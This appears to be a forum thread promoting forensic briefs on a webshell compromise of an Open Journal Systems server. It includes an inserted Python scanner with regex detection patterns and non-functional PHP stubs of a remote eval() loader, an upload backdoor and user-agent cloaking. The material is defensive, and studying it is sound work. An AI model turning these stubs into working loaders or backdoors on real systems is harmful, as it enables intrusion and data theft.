OJSTI-CR-2026-01: Server-Side Compromise in an OJS Environment — Forensic Case Report + 9-Part Analytic Series

We are publishing the first case in the OJS Threat Intelligence (OJSTI) series — a full forensic analysis of a real server-side compromise in an OJS environment.

Master Report (OJSTI-CR-2026-01)
Documents the complete compromise: malicious PHP components across active OJS paths, operational webshell activity, host-level persistence outside the webroot via .bashrc/.zshrc, and database contamination across 191 accounts.

Key techniques mapped to MITRE ATT&CK: T1505.003, T1059.006, T1105, T1036, T1136.

https://ojsone.com/en/resources/ojsti-case-report-2026-01-anonymized-forensic-assessment-of-ojs-server-compromise


Analytic Series — 9 briefs, weekly release
Each brief dissects a specific forensic layer of the same incident:


All findings are anonymized. The goal is to give OJS operators, hosting providers, and institutional security teams actionable intelligence grounded in real evidence — not theory.

If you operate OJS infrastructure and have encountered similar indicators, we welcome discussion.

— Oscar Sandoval, OJS One

ojsone.com/en/cybersecurity

Hi @Oscar_OJSONE,

If you are disclosing potential vulnerabilities, please do so in accordance with our security policy:

I don’t see anything specific enough to be actionable by us (as maintainers of the project) or a web host in this report.

Regards,
Alec Smecher
Public Knowledge Project Team

Hi @asmecher,

Thank you for the response, but I think there’s a fundamental misunderstanding here.

This is not a vulnerability disclosure. No new vulnerability in OJS is being reported, and no action is being requested from PKP as software maintainer.

The report documents a real server-side compromise in a production OJS environment, focusing on attacker behavior, observed artifacts, persistence mechanisms, and operational indicators relevant to those running OJS in real conditions.

The core subject is not the software disclosure cycle — it’s the operational security of already-deployed OJS environments. These are different planes entirely.

That is precisely the gap OJS One is working to fill globally for the community: serious, actionable documentation of what a real compromise looks like in production, what signals to look for, and how to strengthen operations beyond the software itself.

I’d argue this is exactly the kind of material that should be promoted within the ecosystem, because it delivers practical value to the operators, technical teams, and hosting providers who keep OJS running in production.

— Oscar Sandoval, OJS One

OJSTI Series — Brief 02 now published: Initial Intrusion Indicators and Early Timeline

Brief 02 of the OJSTI-CR-2026-01 analytic series is now published.

It covers the initial intrusion indicators and early timeline of the incident — how the attacker established the first foothold and the specific signals that appeared in logs before the compromise became operationally active.

Brief 03 publishes next week: Malicious PHP Components in OJS Environments.

If you’re just joining the series:

If you operate OJS infrastructure and have encountered similar indicators — unexpected PHP files in plugin paths, modified shell configs, anomalous HTTP log patterns — I’d welcome the discussion.

— Oscar Sandoval, OJS One

OJSTI Series — Brief 03 now published: Malicious PHP Components in OJS Environments

Brief 03 of the OJSTI-CR-2026-01 analytic series is now published.

It examines the malicious PHP components identified in the compromised OJS environment — not as isolated files, but as a layered server-side toolkit designed for persistence, remote control, payload refresh, and selective response manipulation.

This brief covers four main capability families:

— cloaking logic for Google-related user agents
— upload-capable webshell functionality
— duplicated file-manager backdoors with embedded authentication
— remote loaders that retrieve external payloads and execute them through eval()

The analytic value of this brief is not only in the individual artifacts, but in how they were distributed across plausible OJS-relative paths — tools, templates, locale resources, plugins, API routes, and controller paths — to blend into normal application structure while preserving operational flexibility.

If you’re just joining the series:

— Master Report (full forensic assessment): https://ojsone.com/en/resources/ojsti-case-report-2026-01-anonymized-forensic-assessment-of-ojs-server-compromise

— Brief 01 (Forensic Scope & Methodology): https://ojsone.com/en/resources/ojsti-case-report-2026-02-forensic-scope-analytic-methodology-and-evidence-basis

— Brief 02 (Initial Intrusion Indicators and Early Timeline): https://ojsone.com/en/resources/ojsti-case-report-2026-03-initial-intrusion-indicators-and-early-timeline-ojs

— Brief 03 (Malicious PHP Components in OJS Environments): https://ojsone.com/en/resources/ojsti-case-report-2026-04-malicious-php-components-in-ojs

— Full series index: ojsone.com/en/cybersecurity

This incident involved webshell deployment, host-level persistence via .bashrc/.zshrc, and database contamination across 191 accounts. All findings are anonymized. 9 briefs total, weekly release.

If you operate OJS infrastructure and have seen similar artifacts — loaders in plausible application paths, file-manager backdoors, cloaking logic, or PHP components executing remote content — I’d welcome the discussion.

— Oscar Sandoval, OJS One
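As an added illustration (not code from the OJSTI reports or from OJS One), the following heuristic scanner walks the OJS-relative directories the brief names as hiding places and flags PHP files matching the four capability families it describes. The directory names, the regexes and the sample files are constructed assumptions; hits are triage leads for review, not verdicts, since legitimate plugins also handle uploads or hash credentials.

```python
"""Heuristic triage of OJS-relative paths for the PHP component families described in Brief 03.
Patterns and sample files are constructed for this example, not indicators taken from the report."""
import re
import tempfile
from pathlib import Path

# One regex per capability family named in the brief (heuristics, tune for your environment).
INDICATORS = {
    "cloaking_google_ua": re.compile(r"HTTP_USER_AGENT[^;]{0,80}google", re.I),
    "upload_capable":     re.compile(r"move_uploaded_file\s*\(|\$_FILES\s*\[", re.I),
    "embedded_auth":      re.compile(r"\b(?:md5|sha1)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "remote_eval_loader": re.compile(r"\beval\s*\(\s*(?:file_get_contents|curl_exec|base64_decode|gzinflate)\s*\(", re.I),
}

# Directories the brief lists as blend-in locations (assumed to sit directly under the OJS root).
WATCHED_DIRS = ("plugins", "templates", "locale", "tools", "api", "controllers")

def scan_ojs_tree(root):
    """Return sorted (relative_path, [matched families]) for every .php file under a watched dir."""
    root = Path(root)
    hits = []
    for d in WATCHED_DIRS:
        base = root / d
        if not base.is_dir():
            continue
        for path in base.rglob("*.php"):
            text = path.read_text(errors="replace")
            families = [name for name, rx in INDICATORS.items() if rx.search(text)]
            if families:
                hits.append((path.relative_to(root).as_posix(), families))
    return sorted(hits)

# Constructed sample tree: one benign plugin file plus three non-functional stubs, one per family group.
SAMPLES = {
    "plugins/generic/demo/DemoPlugin.php": "<?php class DemoPlugin extends GenericPlugin { function getName() { return 'demo'; } }",
    "templates/cache/t.php": "<?php if (stripos($_SERVER['HTTP_USER_AGENT'], 'google') !== false) { exit; }",
    "tools/fm.php": "<?php if (md5($_POST['p']) !== 'HASH_PLACEHOLDER') die(); move_uploaded_file($_FILES['f']['tmp_name'], DEST_PLACEHOLDER);",
    "locale/en/l.php": "<?php eval(file_get_contents(REMOTE_URL_PLACEHOLDER));",
}

def build_sample_tree():
    """Write SAMPLES into a fresh temporary directory laid out like an OJS root; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="ojs_sample_"))
    for rel, body in SAMPLES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root

if __name__ == "__main__":
    for rel, fams in scan_ojs_tree(build_sample_tree()):
        print(f"{rel}: {', '.join(fams)}")
```

Run against a real installation by passing its root to scan_ojs_tree and compare the hits with a known-good checkout of the same OJS version before acting on them.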

Practical follow-up: we released a free, non-intrusive tool to detect publicly visible signals consistent with compromise in OJS sites.

It is useful for administrators, technical teams, and the broader OJS ecosystem. Direct and necessary. It does not replace forensic analysis or deeper technical review.

https://ojsone.com/en/cybersecurity

This topic was automatically closed after 13 days. New replies are no longer allowed.

OJSTI — Brief 05 & 06 now published

Two new briefs extend the OJSTI-CR-2026-01 analysis from intrusion to sustained application-layer control.

Brief 05 — Operational use of webshells in HTTP logs
Documents how webshell activity appears as structured operator behavior within normal traffic: command execution via requests, payload chaining, and indicators of interactive control at log level.

Brief 06 — Persistence, camouflage, and path-level impersonation in OJS
Analyzes how malicious components were distributed across legitimate OJS paths — plugins, templates, controllers — to maintain persistence, evade detection, and mimic application structure.

This is not about isolated artifacts.
This is about how compromise operates and persists inside OJS environments.

Read:
https://ojsone.com/en/resources/ojsti-case-report-2026-05
https://ojsone.com/en/resources/ojsti-case-report-2026-06
